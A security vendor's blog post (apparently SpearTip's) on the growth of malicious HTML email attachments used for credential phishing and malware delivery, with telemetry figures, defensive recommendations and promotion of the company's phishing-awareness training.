Chris Swagler | May 8th, 2023

Researchers are warning that threat operators are increasingly using more malicious HTML files in their cyberattacks, with malicious files accounting for half of all HTML attachments delivered through email. The rate of malicious HTML prevalence has more than doubled since last year, and it does not appear to be the product of mass cyberattack campaigns that deliver the same attachment to numerous people. Threat intelligence reports that anything that has been around for a while does not appear to make it any less potent when it comes to cyberattack tactics and tools. Threat operators are continuing to use malicious HTML because it works. Putting in place adequate security is as vital now as it has always been. 

Why is HTML threat Operators Favorite?

HTML, the standard markup language for displaying website content, has various valid applications within email communications. One example is that company users frequently receive reports generated by numerous applications and tools and delivered through email. When users see the attachment, they aren’t suspicious, and email security gateway filters can’t completely bar the attachment type. Additionally, HTML is flexible regarding the types of cyberattacks it can enable. Credential phishing is a frequent use case, with threat operators creating HTML attachments that, when opened, personates the login page for various services. HTML can be dynamic, using JavaScript code to redirect users to phishing sites. Imagine users receiving emails that appear to be an automated DHL parcel notification, opening the HTML files, and seeing copies of the DHL login page.

The HTML attachments, in other cases, contain links and lures that attempt to persuade users to download a secondary file with a malware payload. The advantage for threat operators is that adding a malware payload directly inside a zip archive or as a separate file type has a considerably higher possibility of bypassing the email security gateway. Because the lures are in front of the users, if they agree to download the files locally to their computers, it’s up to the endpoint protection solution to detect it, so threat operators have already bypassed the first line of defense. According to researchers, there have been other cases in which the HTML file contains sophisticated malware with a completely malicious payload, including complete scripts and executables. The attack technique has become more widely used than those that involve externally hosted JavaScript files.

Malicious HTML Attachments Are Becoming Common

One cybersecurity company analyzed using its telemetry in May 2022 and discovered that 21% of the HTML attachments analyzed by its products were malicious. It’s the highest malicious-to-clean ratio of any file type delivered by email; however, it has worsened since, hitting 45.7% in March of this year. Users who receive an HTML attachment through email have a one-in-two chance that it’s malicious. However, the researchers examined the file’s uniqueness to ensure that several massive cyberattacks do not skew the data. The researchers chose two periods between January and March when considerable increases in malicious HTML files were discovered, implying significant attacks. On March 7, 672,145 malicious HTML artifacts were scanned by the company’s products, of which 181,176 were unique, implying that almost one-quarter of the files were the result of unique attacks. Things were much worse for the second spike on March 23. 85% or nearly nine in ten of the 475,938 malicious HTML detection were unique. Protection against malicious HTML-based attacks must include scanning emails containing HTML attachments, inspecting all redirects, and assessing the email’s content for malicious intent.

Mitigating Malicious HTML Attachments

Email security solutions should be used to examine the full email context rather than simply the attachment’s contents. Additionally, it’s critical to train employees to recognize and report malicious HTML attachments and be skeptical of such attachments from unknown sources. It’s critical for companies to have incident response tools and processes which allows attachments to be removed from all mailboxes they may have reached once it has been identified as malicious by the security team. Using two-factor authentication in conjunction with zero-trust access solutions that assess not just credentials but also users’ devices, locations, time zones, and histories can help limit breaches even if users become victims of phishing and credential theft. Accounts need to have post-login monitoring so that the security team is notified if any suspicious behaviors are identified.

With more threat operators relying on malicious HTML files in their cyberattacks and phishing campaigns, it’s essential for companies to stay ahead of the current threat landscape and train their employees to detect suspicious HTML attachments. At SpearTip, our experts offer phishing awareness training to partners to enhance skills related to defending against these threats. The training tests the discernment of companies’ teams, educates employees regarding common phishing tactics and indicators, and identifies related security gaps in their environment. Our team creates phishing emails and social engineering simulations like those threat actors use and sends them throughout the organization. Throughout the training, SpearTip experts provide insight and feedback to improve the cyber defenses of companies’ teams, leading to a profound decrease in the likelihood of being victimized by phishing or social engineering scams. After the training, our team provides precise and thorough strategies about how to harden their environment and implement ongoing awareness training.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.

Stay Connected With SpearTip

Inside the SOC Newsletter

View our articles that cover trending topics in cybersecurity with insights from our 24/7/365 Security Operations Center.

ShadowSpear Platform

Cybersecurity actors are working around the clock, shouldn’t your security team be too? Technology solutions and security controls fail for a number of reasons, poor deployment, improper implementation, or just no one monitoring the alerts.

ShadowSpear Demo

Experience ShadowSpear for yourself. Our lightweight, integrated solution will help you sleep easier at night and provide immediate confidence in your security posture.